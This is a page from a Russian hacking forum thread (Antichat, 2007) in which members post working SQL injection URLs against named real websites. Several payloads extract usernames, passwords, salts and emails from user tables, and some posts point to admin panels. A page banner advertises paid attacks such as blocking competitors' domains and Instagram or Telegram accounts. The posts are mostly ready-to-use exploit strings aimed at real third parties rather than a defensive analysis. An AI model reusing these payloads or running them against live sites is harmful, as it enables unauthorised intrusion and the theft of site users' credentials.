Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 118 из 1242

118

Опции темы

Поиск в этой теме

Опции просмотра

#1171

20.03.2007, 17:41

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

http://provodka.ru/zakon.php?s=-1+union+select+user()/*

http://www.mosinform.ru/content.php?s=-1+union+select+1,2,3,444,5,6,7,8,9,10+from+news/*

http://www.stove.ru/index.php?lng=0&rs=-1+union+select+concat(table_name,0x3a,version()),2 ,3,4,5,6+from+information_schema.tables/*

Последний раз редактировалось *D1VER; 20.03.2007 в 18:07..

#1172

20.03.2007, 18:11

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://german.berkeley.edu/newsevents/showevent.php?id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26

при неправильном запросе вылетает алерт с описанием ошибки + перекидывает на страницу назад. Наркоманы =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#1173

20.03.2007, 18:43

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

www.stena.ru

Вывод в тайтле.

Код:

http://www.stena.ru/catalog.php?page=-1+union+select+1,concat(version(),char(58),user(),char(58),database()),3,4/*

#1174

20.03.2007, 18:49

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

http://php.scripts.psu.edu/jsp17/index.php?action=cv&id=-1+union+select+1

SQLite
разбираться влом. Таблицы не подобрал, не очень то и старался

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#1175

20.03.2007, 19:43

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

privet.zp.ua

Код:

http://privet.zp.ua/part4.php3?catid=-1+union+select+version()/*

www.eatoutnewyork.com

Код:

http://www.eatoutnewyork.com/orgs/show.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16.../*

#1176

20.03.2007, 20:00

XTErner

Участник форума

Регистрация: 13.03.2007

Сообщений: 120

Провел на форуме:
1604641

Репутация: 590

Код:

http://www.69.is/openlink.php?id=-35207+union+select+1,2,concat(password,0x3a,username),4,5,6,7,8,9,10,11,12+from+users/*

http://www.69.is/admin/

Код:

http://www.beygla.is/fullnews.php?id=704+union+select+1,2,3,4,5,6,7,8+limit+1,1/*&table=news

не выводится на екран((

#1177

20.03.2007, 20:03

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Пантера, там пароль и соль в другой таблице. Вотъ

Цитата:

http://os60.com/index.php?page=others&id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(co nverge_pass_hash,char(58),converge_pass_salt),0x78 ),0x78)+from+ibf_members_converge+limit+0,1/*

ЗЫ Сплоенд от РСТ рулит =)

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 20.03.2007 в 20:05..

#1178

20.03.2007, 22:05

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

Провел на форуме:
4836047

Репутация: 930

www.chayclub.ru

Клуб любителей чайочка =)
Там и админка рядом.

Код:

http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(login,char(58),password),8+from+users/*

www.crimeahouse.ru

Хотите квартиру в криму ? трафа мало... кто хочет доперебирайте колонки...

Код:

http://www.crimeahouse.ru/index.php?pageId=12&region=3&acat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50......./*

Последний раз редактировалось Ksander; 20.03.2007 в 22:44..

#1179

20.03.2007, 22:30

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

http://www.hifisalon.ru/index.php?n=-333+union+select+1,user(),concat(0x2d2d2d2d2d2d2d2 d2d2d2d2d2d3e,table_name)+from+information_schema. tables+limit+5,2/*

#1180

20.03.2007, 22:56

kamaz

Познающий

Регистрация: 31.01.2007

Сообщений: 88

Провел на форуме:
631013

Репутация: 453

Отправить сообщение для kamaz с помощью ICQ

Цитата:

Сообщение от Ksander

www.chayclub.ru

Клуб любителей чайочка =)

Код:

http://www.chayclub.ru/index.php?page=63&id=-1+union+select+1,2,3,4,5,6,concat(username,char(58),user_email,char(58),user_icq,char(58),user_password),8+from+phpbb_users/*

Страница 118 из 1242

118

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход